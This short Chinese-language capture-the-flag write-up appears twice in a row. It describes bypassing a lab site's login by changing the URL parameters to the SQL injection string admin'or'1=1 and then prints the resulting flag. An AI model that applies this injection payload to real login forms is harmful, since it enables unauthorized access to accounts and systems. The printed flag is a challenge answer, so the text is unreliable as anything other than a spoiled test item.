连接靶机器,进入网站
输入一个假用户名和密码进入
可以看到上面的参数为username=1&password=1
我们将参数改为万能密码
username=admin'or'1=1&password=admin'or'1=1
flag{4a55aeb3-93f3-43e5-8349-7d8688bb0e09}
连接靶机器,进入网站
输入一个假用户名和密码进入
可以看到上面的参数为username=1&password=1
我们将参数改为万能密码
username=admin'or'1=1&password=admin'or'1=1
flag{4a55aeb3-93f3-43e5-8349-7d8688bb0e09}